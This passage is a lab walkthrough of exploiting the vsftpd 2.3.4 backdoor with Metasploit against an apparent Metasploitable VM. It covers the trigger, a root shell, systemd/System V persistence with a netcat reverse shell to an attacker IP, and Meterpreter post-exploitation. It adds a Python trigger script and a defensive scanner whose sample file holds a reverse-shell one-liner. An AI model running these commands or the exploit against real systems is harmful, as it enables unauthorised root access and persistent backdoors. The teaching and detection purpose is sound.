1.1.1 Attacking the vsftpd 2.3.4 FTP service
1.1.1.1 Scan the FTP version
See the FTP scanning section.
1.1.1.2 Find an exploit module for the vulnerability
msf6 > search vsftpd type:exploit
1.1.1.3 Select and configure the exploit module
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.1.120
RHOSTS => 192.168.1.120
1.1.1.4 Run the exploit and verify the result
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
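The module above automates the well-known trigger for this backdoor: an FTP USER value containing ":)" makes vsftpd 2.3.4 open a root shell on TCP port 6200. The Python script below is an added example, not part of the original page and not Metasploit's module code. It performs the same two-step check (send the trigger on port 21, then connect to the shell port and run `id`) and, so that it can be run offline, talks to a constructed stand-in of the vulnerable daemon on loopback ephemeral ports. The stand-in's replies, the port numbers and the host are assumptions; against a real target you would call `trigger_backdoor(target, 21)` and `read_backdoor_shell(target, 6200)`.

```python
import socket
import threading

# Well-known behaviour of the vsftpd 2.3.4 backdoor: a USER value containing ":)"
# makes the daemon open a root shell on TCP port 6200. The stand-in server below is
# a constructed emulator on loopback/ephemeral ports, used only so the demo runs offline.
TRIGGER = b":)"
BACKDOOR_PORT = 6200


def trigger_backdoor(host, ftp_port=21, timeout=5):
    """Log in with a smiley in the username, as exploit/unix/ftp/vsftpd_234_backdoor does.
    Returns the server banner so the caller can confirm the version string."""
    with socket.create_connection((host, ftp_port), timeout=timeout) as ctl:
        banner = ctl.recv(1024)               # e.g. b"220 (vsFTPd 2.3.4)\r\n"
        ctl.sendall(b"USER probe" + TRIGGER + b"\r\n")
        ctl.recv(1024)                        # "331 Please specify the password."
        ctl.sendall(b"PASS probe\r\n")        # the module sends this too; no reply is needed
    return banner


def read_backdoor_shell(host, port=BACKDOOR_PORT, timeout=5, command=b"id\n"):
    """Connect to the backdoor port and run one command. None means nothing is listening,
    i.e. the host is not vulnerable (or the trigger did not work)."""
    try:
        shell = socket.create_connection((host, port), timeout=timeout)
    except OSError:
        return None
    with shell:
        shell.sendall(command)
        return shell.recv(4096).decode(errors="replace").strip()


class FakeVsftpd234:
    """Constructed stand-in for the vulnerable daemon (assumption: not real vsftpd code).
    The backdoor socket is bound but not listening until a smiley USER arrives."""

    def __init__(self, host="127.0.0.1"):
        self.host = host
        self.ftp = socket.socket()
        self.ftp.bind((host, 0))
        self.ftp.listen(1)
        self.backdoor = socket.socket()
        self.backdoor.bind((host, 0))
        self.ftp_port = self.ftp.getsockname()[1]
        self.backdoor_port = self.backdoor.getsockname()[1]
        threading.Thread(target=self._control, daemon=True).start()

    def _control(self):
        conn, _ = self.ftp.accept()
        with conn:
            conn.sendall(b"220 (vsFTPd 2.3.4)\r\n")
            user = conn.recv(1024)
            if user.startswith(b"USER ") and TRIGGER in user:
                self.backdoor.listen(1)       # backdoor port opens before the 331 reply
                threading.Thread(target=self._shell, daemon=True).start()
            conn.sendall(b"331 Please specify the password.\r\n")
            conn.recv(1024)                   # PASS line; the stand-in does not answer it

    def _shell(self):
        conn, _ = self.backdoor.accept()
        with conn:
            if conn.recv(1024).strip() == b"id":
                conn.sendall(b"uid=0(root) gid=0(root) groups=0(root)\n")


def demo():
    """Trigger the stand-in and return (banner, output of `id` on the backdoor shell)."""
    srv = FakeVsftpd234()
    banner = trigger_backdoor(srv.host, srv.ftp_port)
    return banner, read_backdoor_shell(srv.host, srv.backdoor_port)


def demo_not_vulnerable():
    """A closed port (bound and immediately released) yields None: nothing to connect to."""
    probe = socket.socket()
    probe.bind(("127.0.0.1", 0))
    port = probe.getsockname()[1]
    probe.close()
    return read_backdoor_shell("127.0.0.1", port, timeout=1)


if __name__ == "__main__":
    print(demo())
    print(demo_not_vulnerable())
```

`read_backdoor_shell` returning None is the negative result a scanner should report as "not vulnerable", which is also why the stand-in keeps its backdoor socket bound but not listening until the trigger arrives: a connection refused on 6200 before the trigger and a root `id` after it is exactly the evidence the msf module relies on.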

1.1.1.5 Post-exploitation (set up a persistent connection)
msf6 > search persistence

msf6 > use exploit/linux/local/service_persistence
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(linux/local/service_persistence) > show options

msf6 exploit(linux/local/service_persistence) > show targets

# Older distributions use System V; newer ones can use systemd. Pick the target that matches the victim's init system.
msf6 exploit(linux/local/service_persistence) > set target System V
target => System V
# The already established session that you want to make persistent
msf6 exploit(linux/local/service_persistence) > set SESSION 1
SESSION => 1
# Name of the shell script written to /usr/local/bin on the target; a random name is generated if unset
msf6 exploit(linux/local/service_persistence) > set SHELL_NAME autoStart
SHELL_NAME => autoStart
# Name of the service script written to /etc/init.d/ on the target; a random name is generated if unset
msf6 exploit(linux/local/service_persistence) > set SERVICE CMD
SERVICE => CMD
msf6 exploit(linux/local/service_persistence) > exploit

1.1.1.6 Listen in msf with the same payload that the persistence module used
# The payload and LPORT must match what service_persistence dropped on the target (both default to cmd/unix/reverse_netcat on port 4444); LHOST is the attacker's address.
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload cmd/unix/reverse_netcat
payload => cmd/unix/reverse_netcat
msf6 exploit(multi/handler) > set LHOST 192.168.10.180
LHOST => 192.168.10.180
msf6 exploit(multi/handler) > exploit
1.1.1.7 Reboot the target server and verify
# Upgrade the shell session to Meterpreter: a plain shell payload is small, transfers fast and connects reliably, and once it is in, upgrading to Meterpreter adds the extra functionality.
msf6 exploit(multi/handler) > sessions -u 1

msf6 exploit(multi/handler) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : metasploitable.localdomain
OS           : Ubuntu 8.04 (Linux 2.6.24-16-server)
Architecture : i686
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > run post/linux/gather/

meterpreter > run post/linux/gather/checkvm
[*] Gathering System info ....
[+] This appears to be a 'KVM' virtual machine
# Inspect the backdoor service and start-up script that were written to disk.
# The names in this listing are random ones, i.e. from a run in which SHELL_NAME and SERVICE were left unset.
meterpreter > cd /usr/local/bin/
meterpreter > ls
Listing: /usr/local/bin
=======================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100711/rwx--x--x  104   fil   2022-06-09 15:03:06 +0800  sOLIy

meterpreter > cd /etc/init.d/
meterpreter > ls -ltr
Listing: /etc/init.d
====================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100755/rwxr-xr-x  1839  fil   2022-06-09 15:03:07 +0800  ZAyWaZM
100755/rwxr-xr-x  429   fil   2012-05-14 13:33:42 +0800  distcc
100755/rwxr-xr-x  6860  fil   2008-12-08 03:13:14 +0800  tomcat5.5

meterpreter > background
[*] Backgrounding session 2...
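Seen from the defender's side, the two files in the listing above (a freshly created script in /etc/init.d and a small executable in /usr/local/bin) are the artifacts to hunt for. The script below is an added example, not from this page and not Metasploit code: it scans a directory for scripts that were modified recently or that contain reverse-shell markers (nc followed by an IP address, mkfifo, /dev/tcp, bash -i), and runs against a constructed temporary tree that imitates the listing. The file names (distcc, ZAyWaZM, sOLIy) are taken from the page; their contents and timestamps, including the netcat reverse-shell one-liner in the shape cmd/unix/reverse_netcat produces, are constructed for the example.

```python
import os
import re
import tempfile
import time

# Markers of a netcat/bash reverse shell such as the one cmd/unix/reverse_netcat drops.
REVERSE_SHELL_PATTERNS = (
    r"\bnc\b.*\b\d{1,3}(?:\.\d{1,3}){3}\b",   # nc <ip> <port>
    r"\bmkfifo\b",                              # fifo used to wire nc to /bin/sh
    r"/dev/tcp/",                               # bash built-in socket
    r"\bbash -i\b",                             # interactive bash reverse shell
)


def scan_dir(path, newer_than_days=7, now=None):
    """Return [(file, reason)] for files in `path` that were modified within
    `newer_than_days` days or that contain any reverse-shell marker."""
    now = time.time() if now is None else now
    findings = []
    for name in sorted(os.listdir(path)):
        full = os.path.join(path, name)
        if not os.path.isfile(full):
            continue
        reasons = []
        age_days = (now - os.path.getmtime(full)) / 86400
        if age_days < newer_than_days:
            reasons.append("modified %.1f days ago" % age_days)
        with open(full, errors="replace") as fh:
            text = fh.read()
        for pat in REVERSE_SHELL_PATTERNS:
            if re.search(pat, text):
                reasons.append("matches " + pat)
        if reasons:
            findings.append((full, "; ".join(reasons)))
    return findings


def build_sample_tree():
    """Constructed temp tree imitating the page's listing: file names come from the page,
    contents and timestamps are assumptions made for this example."""
    root = tempfile.mkdtemp()
    initd = os.path.join(root, "etc", "init.d")
    bindir = os.path.join(root, "usr", "local", "bin")
    os.makedirs(initd)
    os.makedirs(bindir)
    # A legitimate init script, untouched for years
    distcc = os.path.join(initd, "distcc")
    with open(distcc, "w") as fh:
        fh.write("#!/bin/sh\n### BEGIN INIT INFO\n# Provides: distcc\n### END INIT INFO\n"
                 "exec /usr/bin/distccd --daemon\n")
    old = time.time() - 3650 * 86400
    os.utime(distcc, (old, old))
    # The dropped service wrapper: nothing suspicious inside, but it is brand new
    with open(os.path.join(initd, "ZAyWaZM"), "w") as fh:
        fh.write("#!/bin/sh\n### BEGIN INIT INFO\n# Provides: ZAyWaZM\n### END INIT INFO\n"
                 "case \"$1\" in start) /usr/local/bin/sOLIy & ;; esac\n")
    # The payload it launches, in the form cmd/unix/reverse_netcat generates (constructed here)
    with open(os.path.join(bindir, "sOLIy"), "w") as fh:
        fh.write("#!/bin/sh\nmkfifo /tmp/qwe; nc 192.168.10.180 4444 0</tmp/qwe | "
                 "/bin/sh >/tmp/qwe 2>&1; rm /tmp/qwe\n")
    return root


def demo():
    """Scan the constructed tree; on a real host point scan_dir at /etc/init.d and /usr/local/bin."""
    root = build_sample_tree()
    return {
        "init.d": scan_dir(os.path.join(root, "etc", "init.d")),
        "bin": scan_dir(os.path.join(root, "usr", "local", "bin")),
    }


if __name__ == "__main__":
    for where, hits in demo().items():
        for path, why in hits:
            print(where, path, "->", why)
```

The wrapper in /etc/init.d contains nothing that a content pattern would catch (it only starts a file in /usr/local/bin), so the recency check is what flags it; the payload script is caught by content regardless of age. On a real host, extend the directory list to /etc/systemd/system when the module was run with the systemd target.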
